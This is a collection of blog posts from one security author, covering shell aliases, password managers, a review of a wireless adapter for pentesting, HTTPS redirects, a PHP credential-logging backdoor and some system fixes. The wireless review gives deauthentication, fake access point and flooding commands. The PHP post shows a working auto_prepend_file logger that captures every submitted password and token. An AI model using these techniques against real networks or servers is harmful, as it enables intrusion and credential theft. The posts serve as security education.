c=\u0026#39;clear\u0026#39; Combined Just copy and paste within your ~/.bash_profile or ~/.bashrc and run source.\n# Reload alias reload=\u0026#39;source ~/.bash_profile\u0026#39; # Network alias nets=\u0026#39;lsof -i\u0026#39; alias myip=\u0026#39;curl ifconfig.co\u0026#39; alias speedtest=\u0026#39;curl -o /dev/null http://ovh.net/files/100Mio.dat\u0026#39; # Server Headers headers () { /usr/bin/curl -X GET -I -L -k -A \u0026#39;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36\u0026#39; $@ ; } # View Page Source view-source () { /usr/bin/curl -L -k -A \u0026#39;Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0\u0026#39; $@ ; } # File Header filehead () { /usr/bin/xxd -u -g 1 $@ | /usr/bin/head ;} # Common alias cp=\u0026#39;cp -iv\u0026#39; alias mv=\u0026#39;mv -iv\u0026#39; alias mkdir=\u0026#39;mkdir -pv\u0026#39; alias ll=\u0026#39;ls -FGlAhp\u0026#39; alias less=\u0026#39;less -FSRXc\u0026#39; alias CD=\u0026#39;cd\u0026#39; alias cd..=\u0026#39;cd ../\u0026#39; alias ..=\u0026#39;cd ../\u0026#39; alias ...=\u0026#39;cd ../../\u0026#39; alias ....=\u0026#39;cd ../../../\u0026#39; alias .....=\u0026#39;cd ../../../../\u0026#39; alias ~=\u0026#39;cd ~\u0026#39; alias c=\u0026#39;clear\u0026#39; ","permalink":"https://markuta.com/useful-bash-shell-aliases/","title":"A Few Handy Bash Shell Aliases"},{"categories":null,"contents":"Let\u0026rsquo;s face it: remembering passwords for dozens of sites is a pain, which is why some people re-use their password or change it very slightly to avoid the hassle. If you\u0026rsquo;re one of those who would rather generate random complex passwords for each site, the question of how those are stored will arise. Storing passwords in a plaintext file on your desktop is a big no-no.\nPassword Managers are great, when they\u0026rsquo;re implemented correctly.
I\u0026rsquo;m personally not a fan of cloud-based password managers due to privacy concerns and not knowing exactly how all my passwords are stored and handled. When my own machine gets compromised, that\u0026rsquo;s down to me not configuring it properly or not following best security practices. But when it\u0026rsquo;s out of my control, I may have taken every necessary step to ensure my data is safe and yet, somehow, all the \u0026ldquo;keys to my castle\u0026rdquo; still get compromised or leak. I\u0026rsquo;d prefer not to take any chances and can do without cloud services or proprietary software.\nA list of Password Management services that have been compromised or do stuff that\u0026rsquo;ll make you worry:\nOneLogin - Breached 1 1Password - Leaking Data 2 LastPass - Security Breached 2015 3, Security Issue 2016 4 List of other password managers: https://en.wikipedia.org/wiki/List_of_password_managers\nKeepassXC As stated on their website, KeepassXC is a community fork of KeePassX, a native cross-platform port of KeePass Password Safe. It is developed in C++ and runs natively on all three supported platforms (Linux, Windows and Mac OS). The interface is simple and straightforward to use, though I personally think the icons could be improved.\nA really nice Setup Guide can be found here: https://sts10.github.io/2017/06/27/keepassxc-setup-guide.html\nLocked Window Unlocked Window Password Generator What works for me By far the most relevant aspects to me are:\nYour wallet works offline and requires no Internet connection. I\u0026rsquo;m in full control of my password manager. Cross-platform support; Linux, Unix, Mac OS and Windows.
Open Source - code review and the option to implement custom features :) Support for additional authentication methods (YubiKey, key file) Cracking the Encrypted Database Like with any other security application, I\u0026rsquo;m always curious about how it handles certain situations; one of those is the way in which KeePassXC encrypts the main database file.\nIf an adversary has a copy of your encrypted database, how difficult would it be to crack?\nWell, that depends on your master key of course. Not to mention any additional protection (key file or challenge-response) you\u0026rsquo;ve got set up.\nThe figures below are based on Hashcat benchmark data provided by Jeremi Gosney, run on a dedicated password-cracking monster, the Sagitta Brutalis: a system featuring eight Nvidia GTX 1080 Ti FE GPUs and two 8-core Intel E5-2600 v4 Xeons for only $21,169.00 (base price).\nThe table below shows cracking performance against several other password managers, using only the master password and the algorithms currently supported by Hashcat 3.5.0-22-gef6467b. Each speed result is the combined power of the eight GPU cards, not of an individual card.\nHashtype Speed (kH/s)\n1Password, cloudkeychain 137.7 kH/s\nKeePass 1 (AES/Twofish) and KeePass 2 (AES) 1733.4 kH/s\nPassword Safe v2 4024.7 kH/s\nPassword Safe v3 15378.8 kH/s\nLastPass + LastPass sniffed 29242.3 kH/s\n1Password, agilekeychain 40477.9 kH/s\n1Password (cloudkeychain) performed surprisingly well, being roughly 10 times more computationally expensive to process than KeePass (AES).
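To put these speeds into perspective, here is a rough back-of-the-envelope sketch (my own illustration, not part of the original benchmark), assuming a fully random 8-character lowercase master password and the KeePass (AES) rate of 1733.4 kH/s from the table:

```shell
# Worst-case exhaustive search time at the benchmarked KeePass (AES) rate.
keyspace=$((26 ** 8))          # 8 random lowercase letters: 208827064576 candidates
rate=1733400                   # 1733.4 kH/s expressed in hashes per second
seconds=$((keyspace / rate))
echo "$seconds seconds (~$((seconds / 86400)) days)"
```

Under those assumptions the entire keyspace falls in well under two days on this one rig, which is why a long, high-entropy master password (or an additional key file) matters far more than the choice of manager.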
Keep in mind, KeePass and many others allow users to add an additional authentication factor such as a key file or challenge-response, without which an adversary cannot crack the database no matter how much hardware they throw at it.\nPassword Manager OneLogin hit by data breach; BBC\n1Password Leaks Your Data; myers.io\nLastpass Breached; nakedsecurity.sophos.com\nLastpass Vulnerability (Fixed); labs.detectify.com\n","permalink":"https://markuta.com/my-password-management/","title":"What I Use for Password Management"},{"categories":null,"contents":"The Alfa AWUS052NH is a high-performance Dual-Band (2.4GHz and 5GHz) wireless USB adapter. It\u0026rsquo;s based on the MediaTek RT3572 chipset, which supports the IEEE 802.11 a/b/g/n standards with up to 300Mbps transfer speeds. It\u0026rsquo;s Alfa\u0026rsquo;s third device in their 802.11abgn USB product range, has been available since March 2015, and costs around £47 or $60 depending on where you buy it.\nThis review is geared towards anyone with an interest in wireless network security or penetration testing who is contemplating a purchase, as well as any tech enthusiast. I\u0026rsquo;ll briefly touch on some attacks too. Please don\u0026rsquo;t hesitate to get in contact if I\u0026rsquo;ve missed anything.\nUPDATE: Kali Linux (kernel 4.12.6) has issues with wireless cards. There seems to be an issue with the recent 4.12.6-1kali1 kernel update which caused really poor performance on a lot of wireless devices. I\u0026rsquo;ve re-tested on the older kernel 4.11.6-1kali1 and it worked fine; I\u0026rsquo;ve written a quick How-to Downgrade tutorial for falling back to an older kernel. Update [2]: Kali Linux has migrated to a new kernel, 4.12.13-1kali2, which fixes the wireless issues, at least for this card.\nDevice Specification Photograph of a setup I previously had, not the current one I\u0026rsquo;ll be testing with.
From left to right: Alfa wireless device, Raspberry Pi 2, Anker battery and MacBook Pro.\nDescription Value\nFrequencies 2.4GHz and 5GHz\nStandards 802.11 a/b/g/n\nChipset MediaTek RT3572\nMIMO 2x2:2\nWireless Security WEP, WPA/2, 802.1X \u0026amp; WPS\nOperating Modes IBSS, managed, AP, monitor, WDS, mesh point\nRadio Antenna Two 5dBi detachable antennas with RP-SMA male connectors\nPower Output Tx-Power b/g:30dBm* a:27dBm*\nConnector Type Mini-USB to USB 2.0 Type A\nInside the package:\nAlfa AWUS052NH wireless device (includes a clipper) Two 5dBi Dipole Antennas Mini-USB to USB 2.0 Type A Y cable (for providing extra power) Instruction Manual Driver CD\nSetup I\u0026rsquo;ve tried to simulate an attacker\u0026rsquo;s environment, with the first three being the main components:\nLaptop running Kali Linux Light 4.11.0-kali1-amd64 on VMware Fusion, on a Mac OS host machine with its wireless network card. Linksys E2500 Wireless Router (IEEE 802.11 a/b/g/n) running Tomato by Shibby firmware for better configuration options and other advanced features. Alfa Wireless Network USB Card. Mobile devices that have dual-band support.\nTools \u0026amp; Attacks Tested The tests were performed on the latest default Kali Linux driver for RT3572 chipsets (rt2800usb).\nTested 2.4GHz 5GHz Notes\nairodump-ng yes yes 2.4GHz and 5GHz monitoring and sniffing worked really well.\naireplay-ng yes yes* deauth attack works on both bands. packet injection appears to work with the -D option, however more tests are required.\nairbase-ng yes yes worked very well.\nwireshark yes yes no issues analyzing packets while in live monitor mode.\nkismet yes yes no issues.\nmdk3 yes yes* deauth attacks work well, may reset access points.\nevil-twin yes yes no issues.\ncaptive portal yes yes no issues.\nairodump-ng Performed very well at passive scanning on both bands; I was able to successfully capture four-way handshakes, channel hop, probe access points and reveal hidden ones too.
I\u0026rsquo;ve always maintained a strong connection and never had any drop-out issues.\nScanning 5GHz frequencies with --band a or --channel 36-165 while channel hopping may display (-1); this can be easily resolved by selecting a specific channel rather than channel hopping. The --ignore-negative-one option doesn\u0026rsquo;t seem to help either.\naireplay-ng Running an aireplay-ng test on the b/g (2.4GHz) band works really well and supports packet injection and deauth attacks right out of the box, as expected. Results:\nroot@Kali:~# aireplay-ng --test -e XXXXXX -a 20:AA:XX:XX:XX:XX wlan0mon 13:46:18 Waiting for beacon frame (BSSID: 20:AA:XX:XX:XX:XX) on channel 1 13:46:18 Trying broadcast probe requests... 13:46:18 Injection is working! 13:46:20 Found 1 AP 13:46:20 Trying directed probe requests... 13:46:20 20:AA:XX:XX:XX:XX - channel: 1 - \u0026#39;XXXXXX\u0026#39; 13:46:21 Ping (min/avg/max): 1.458ms/16.169ms/34.363ms Power: -8.07 13:46:21 30/30: 100% Unfortunately, aireplay-ng wasn\u0026rsquo;t capable of packet injection on 5GHz frequencies, which is a shame. Running the same test under a specific 5GHz channel (40), set with iwconfig wlan0mon channel 40 beforehand, failed. Results:\nroot@Kali:~# aireplay-ng --test -e XXXXXX-5G -a 20:AA:XX:XX:XX:XX wlan0mon 13:49:56 Waiting for beacon frame (BSSID: 20:AA:XX:XX:XX:XX) on channel 40 13:50:06 No such BSSID available. Wait, what? By giving the -D (override AP detection), -a (access point BSSID) and -e (access point ESSID) options, the test was able to complete. I\u0026rsquo;m a bit skeptical about this, as I\u0026rsquo;ve read that aircrack-ng 5GHz injection isn\u0026rsquo;t supported properly; anyway, here were the results:\nDe-authentication on 5GHz works! A client in range, connected to the target access point on channel 48 using 802.11an (40MHz), immediately lost connection.
Options used: -D override AP detection, -a access point BSSID, -c client MAC address and -e access point ESSID. Results:\nAn unusual de-authentication method was found when using --fakeauth. The key here is to use the -h option to change the Alfa device\u0026rsquo;s MAC address to that of a client already associated with an access point; after a few packets the access point sends a deauthentication packet to both us and the real client. Results:\nroot@kali:~# aireplay-ng -D --fakeauth 6000 -o 1 -q 10 -a 20:AA:XX:XX:XX:XX \\ -h E0:F8:XX:XX:XX:XX -e XXXXXX-5G wlan0mon\nairbase-ng Create a fake access point for capturing handshakes. Devices with saved profiles will most likely try to connect to a network with a better signal. This attack is especially useful when it\u0026rsquo;s just the client, as only three packets are needed to launch a dictionary attack on the handshake (BSSID, Anonce \u0026amp; Snonce + MIC). The following shows the options used to create the clone listening on channel 44:\nroot@Kali:~# airbase-ng -c 44 -e \u0026#34;XXXXXX-5G\u0026#34; -a 20:AA:XX:XX:XX:XX -W 1 -Z 2 \\ -n 484024ace58c73f81692083e987ed9bd33fa5ddf148a6d35181c38f59447e2dc wlan0\nThe -Z 2 (WPA2 TKIP) option was best suited in this attack, as -Z 4 (WPA2 CCMP) had difficulties retrieving the 2nd part of the four-way handshake and led to the client having to re-enter their password (not stealthy). One interesting option, -n, sets a specific Anonce value rather than having one randomly generated; this could be useful for future debugging and testing purposes.\nFor this attack to be successful it\u0026rsquo;s important the client actually knows the correct password, otherwise you\u0026rsquo;ll waste time cracking a wrong one.\nwireshark Analyzing network packets with wireshark.
I was able to view live packets, in this particular case the first two messages of the four-way handshake as well as the custom Anonce previously set up by airbase-ng. Results:\nA few other useful filters:\nGet (1/4) of four-way handshake: wlan_rsna_eapol.keydes.mic contains 0:0\nGet (1/4) of four-way handshake, TKIP only: eapol.keydes.key_info == 0x0089\nGet (2/4) of four-way handshake, TKIP only: eapol.keydes.key_info == 0x0109\nGet frames by specific Anonce or Snonce: wlan_rsna_eapol.keydes.nonce contains 48:40:24\nkismet My second choice when it comes to network sniffers or monitors. It performed very well in identifying networks on both bands. I didn\u0026rsquo;t test any plugins or intrusion detection capabilities, but I\u0026rsquo;m sure there is no reason for them not to work.\nmdk3 A really noisy method that cripples an access point by connecting thousands of fake client devices, which completely destroys the network and in some cases resets the router. Tests revealed that while using the following option it was difficult to capture handshakes:\nmdk3 wlan0mon a -a 20:AA:XX:XX:XX:XX -m E0:F8:XX:XX:XX:XX\nThe de-authentication attack (d option) on 5GHz 802.11a/n does work. Tested with 802.11a 20MHz + 40MHz, and 802.11an with 20MHz + 40MHz, on channels 36, 40, 44 and 48. The de-authentication attack on the 2.4GHz band works too.\nmdk3 wlan0mon d -b blacklist.txt -c 40\nThe file blacklist.txt contains a list of BSSID addresses.\nevil-twin The evil-twin attack makes use of hostapd, dnsmasq and iptables rules if one plans to phish out credentials. This attack centres heavily on the hostapd program; for basic functionality a wireless interface card must support the AP operating mode, and since almost all wireless cards support this mode there were no issues configuring a clone access point to perform our pentesting tasks.\nIt was also possible to perform a simulated attack against the WPA2 Enterprise (802.1X) standard on both bands.
The attack itself relies on a patched version of hostapd called hostapd-wpe, which will capture the challenge submitted by a user if they decide to accept an attacker-supplied certificate.\ncaptive-portal Much like the evil-twin attack, with additional iptables rules for forwarding traffic and a web server to serve a fake captive-portal page. This attack works really well when clients use hotspot assistant software such as the Mac\u0026rsquo;s \u0026lsquo;Captive Network Assistant\u0026rsquo; or enable auto-connect features. They\u0026rsquo;ll be asked to provide login credentials in order to proceed, for example on the \u0026lsquo;BT-with-FON\u0026rsquo; wi-fi hotspots found all over Europe.\nNo special configuration is needed, as it only requires a device with AP mode.\nMiscellaneous Adjusting TX-power output. I was able to achieve 30dBm (bg) and 27dBm (a) specific to each channel by changing country regulatory settings; be sure this is legal under your country\u0026rsquo;s telecommunication laws.\nPairing the wireless device with something like a Raspberry Pi 2 on its own will not work. The RPi2 doesn\u0026rsquo;t provide enough juice to power the ALFA device, which is why in the first photograph above it\u0026rsquo;s being powered by a battery pack; it\u0026rsquo;s also the reason they supply a USB Y cable.\nDetachable antennas are a really nice feature; even though the writer didn\u0026rsquo;t make use of them, they\u0026rsquo;re still an important aspect all external wireless devices should have.\nSummary The ALFA AWUS052NH wireless USB device, or what I like to refer to as \u0026rsquo;the Orange One\u0026rsquo;, is another great product from Alfa Networks. Its Dual-Band monitoring and sniffing capabilities are a treat to have, more so when considering its power output compared to other devices on the market. The most surprising aspect of this card was the aireplay-ng test with the -D option, without which I couldn\u0026rsquo;t even perform a simple de-authentication attack.
Overall I can confidently say this device supports passive and active attacks on both bands, as I was able to attack the following security standards: WPA/2 (TKIP), WPA/2 (CCMP) and WPA2-Enterprise. The 802.11ac standard wasn\u0026rsquo;t tested, as the writer currently doesn\u0026rsquo;t own any supported devices.\nIt\u0026rsquo;s undoubtedly a product worth checking out, especially for pentesters.\nWhat\u0026rsquo;s next Purchase two wireless cards based on the Atheros (AR 9590) chipset, which uses the ath9k driver, preferably the Compex WLE350NX mini-PCIe card. Atheros chipsets have a great reputation when it comes to wireless penetration testing, especially packet injection; this particular chipset supports 3x3:3 MIMO and 802.11a/b/g/n on both 2.4GHz and 5GHz.\nAdd to that a Laguna GW2387 Single Board Computer (SBC), or any that supports multiple mini-PCIe slots working simultaneously. This device would be a sort of drop box: a physical device that can be hidden somewhere in range of a target\u0026rsquo;s wireless network and accessed remotely via LTE on the attacker\u0026rsquo;s side.\n","permalink":"https://markuta.com/alfa-awus052nh-review/","title":"Alfa AWUS052NH Wireless USB Review"},{"categories":null,"contents":"I\u0026rsquo;ve seen plenty of websites that use https but don\u0026rsquo;t force it by default; this isn\u0026rsquo;t considered good security practice and should be resolved promptly. Below are configurations for five of the most popular web servers (Nginx, Apache, IIS, OpenLiteSpeed and Lighttpd) to force HTTPS by default.\nAll tests were carried out on a local Debian Stretch server, with the exception of IIS.\nAll http:// requests will be redirected (301 Moved Permanently) to https:// with the respective request path.\nNginx Tested version 1.6.2. Configuration file /etc/nginx/sites-enabled/example.conf within the server{ } section:\nserver { listen 80; server_name www.example.com; return 301 https://$server_name$request_uri; } Apache Tested version 2.4.10.
Configuration file /etc/apache/sites-enabled/httpd.conf within the \u0026lt;VirtualHost\u0026gt; section. Note the permanent argument, so Apache issues a 301 rather than its default 302:\n\u0026lt;VirtualHost *:80\u0026gt; ServerName www.example.com DocumentRoot /var/www/html Redirect permanent / https://www.example.com/ \u0026lt;/VirtualHost\u0026gt; IIS May require an additional module to be installed; more details are available over at Microsoft\u0026rsquo;s guide. Configuration file web.config within the \u0026lt;rewrite\u0026gt; section (redirectType is set to Permanent for a 301):\n\u0026lt;rewrite\u0026gt; \u0026lt;rules\u0026gt; \u0026lt;rule name=\u0026#34;Force https\u0026#34; enabled=\u0026#34;true\u0026#34; patternSyntax=\u0026#34;Wildcard\u0026#34; stopProcessing=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;match url=\u0026#34;*\u0026#34; negate=\u0026#34;false\u0026#34; /\u0026gt; \u0026lt;conditions logicalGrouping=\u0026#34;MatchAny\u0026#34;\u0026gt; \u0026lt;add input=\u0026#34;{HTTPS}\u0026#34; pattern=\u0026#34;off\u0026#34; /\u0026gt; \u0026lt;/conditions\u0026gt; \u0026lt;action type=\u0026#34;Redirect\u0026#34; url=\u0026#34;https://{HTTP_HOST}{REQUEST_URI}\u0026#34; redirectType=\u0026#34;Permanent\u0026#34; /\u0026gt; \u0026lt;/rule\u0026gt; \u0026lt;/rules\u0026gt; \u0026lt;/rewrite\u0026gt; OpenLiteSpeed Tested version 1.4.26. Configuration file /usr/local/lsws/conf/vhosts/Example/vhconf.conf within the rewrite { } section. Alternatively edit settings through the provided WebAdmin (on port 7080) by navigating to Virtual Hosts \u0026gt; Rewrite \u0026gt; Rewrite Rules and add the following:\nRewriteCond %{HTTPS} !on RewriteRule ^(.*)$ https://%{SERVER_NAME}%{REQUEST_URI} [R=301,L] Lighttpd Tested version 1.4.35. Configuration file /etc/lighttpd/lighttpd.conf.
The following will apply to all vhosts:\n$HTTP[\u0026#34;scheme\u0026#34;] == \u0026#34;http\u0026#34; { # Apply to all vhosts $HTTP[\u0026#34;host\u0026#34;] =~ \u0026#34;.*\u0026#34; { url.redirect = (\u0026#34;.*\u0026#34; =\u0026gt; \u0026#34;https://%0$0\u0026#34;) } } ","permalink":"https://markuta.com/force-https-on-web-servers/","title":"How to Force HTTPS on Web Servers"},{"categories":null,"contents":"Let\u0026rsquo;s say a server has been exploited and an attacker wants to intercept data coming from a web application in order to gain sensitive information such as plaintext server passwords. Let\u0026rsquo;s also say that application is WHMCS. One of its requirements is IonCube Loader, which protects PHP source code from easy observation, theft and modification by compiling it into bytecode.\nSample of WHMCS with IonCube-encoded source code When an encoded IonCube file is changed in any way, a 500 Internal Server Error occurs.\nA simple trick for getting around files protected by the IonCube or Zend Guard loaders, and for including our own code to perform malicious things, is to utilize the PHP auto_prepend_file directive together with the way the web server is configured. This of course means the attacker has already gained access and sufficient privileges. I\u0026rsquo;ve set up MAMP v4.1.1 running PHP v7.0.15 (the latest that IonCube can support) with WHMCS v7.2.2.\nWhen using PHP as an Apache module, you can change PHP configuration settings using .htaccess files if AllowOverride Options is set.
The example below shows a .htaccess file that sets two values under the WHMCS installation document_root:\nAn include path that locates our script A filename that\u0026rsquo;ll be automatically prepended to any PHP document php_value include_path \u0026#34;.:/Applications/MAMP/htdocs/whmcs\u0026#34; php_value auto_prepend_file \u0026#34;log.php\u0026#34; A PHP script called log.php is created for storing $_POST values.\n\u0026lt;?php file_put_contents(\u0026#39;/Applications/MAMP/htdocs/whmcs/templates_c/post_data.txt\u0026#39;, var_export($_POST, true)); ?\u0026gt; For simplicity\u0026rsquo;s sake, both the .htaccess and log.php files are placed in the same path.\nExample of Intercepted Data ALL values sent through the superglobal variable $_POST are intercepted. Given the nature of WHMCS as a hosting content management system, it can be extremely useful for attackers to implement such loggers: plaintext server configurations, passwords, financial information, tokens, private keys and much more.\nIn the case of Nginx or other web servers, the attacker would change the main PHP configuration file (php.ini) by adding a value to the auto_prepend_file directive. Keeping in mind that this would affect every PHP script when loaded, the attacker may adjust the script to only target specific variables, or else the log file will fill with junk and uninteresting information, not to mention grow in size quite quickly.\nAdministrators should be wary of the auto_prepend_file and auto_append_file PHP directives and their potential uses to attackers; backdoors of this nature can be particularly harmful to organisations processing sensitive data.\n","permalink":"https://markuta.com/being-evil-against-encoded-php-files/","title":"Being Evil against Encoded PHP Files"},{"categories":null,"contents":"I decided to install the latest stable branch of Debian Stretch on a budget laptop (Toshiba Satellite C50-B-14D) bought in 2015. Its minimal specs were perfect for Linux.
The installation image used was debian-9.0.0-amd64-netinst.iso. Once the installation process finished and I restarted the system, it would not recognise GRUB or any boot partition.\nSolution Rename the folder and filename /EFI/debian/grubx64.efi to /EFI/boot/bootx64.efi Read more: https://wiki.debian.org/UEFI#Booting_a_UEFI_machine_normally\nWith the different filename, the UEFI implementation recognised the disk and booted successfully. This might not work on all manufacturers\u0026rsquo; machines.\nCommands with Mac OS El Capitan Below are the terminal commands used to quickly mount disks and rename files and folders, with the external hard disk connected. Disk names may differ from yours.\n$ diskutil list $ diskutil mount /dev/disk2s1 $ cd /Volumes/NO\\ NAME/EFI/ $ mv debian boot $ cd boot $ mv grubx64.efi bootx64.efi $ sync $ diskutil umount /dev/disk2s1 ","permalink":"https://markuta.com/bad-uefi-implementation-workaround/","title":"Bad UEFI implementation Workaround"},{"categories":null,"contents":"While working on a virtual pentest lab in VMware Fusion, I wanted to emulate a Cisco router on a virtual network. The tool I used, Dynamips, did exactly that. However, it was eating up all CPU resources, making other guests almost unusable.\nBelow shows the VMware Fusion process running in Activity Monitor:\nFix Open the Dynagen management console with dynagen /opt/config.net and run idlepc get R1 (R1 is the name of the router), which will calculate a better Idle PC value for the current guest. This may take a few seconds and should present you with the following:\nAs the screenshot reads, select the number best suited to your system, hinted by an (*). This change applies to the current session only, meaning it will have to be set again once the program restarts.\nPersistent Change To make the change persistent, edit your configuration file e.g.
/opt/config.net and include the idlepc keyword and the value calculated previously, in my case:\n# Simple lab [localhost] [[7200]] image = /opt/7200-images/c7200-jk9o3s-mz.124-25d.image npe = npe-400 ram = 256 # keep CPU usage below 100%. idlepc = 0x6079ca5c [[ROUTER R1]] f0/0 = NIO_linux_eth:eth0 f1/0 = NIO_linux_eth:eth1 I\u0026rsquo;ll post the full workings of my virtual network architecture in the near future.\n","permalink":"https://markuta.com/dynamips-cpu-fix/","title":"Dynamips at 100% CPU Usage Fix"}]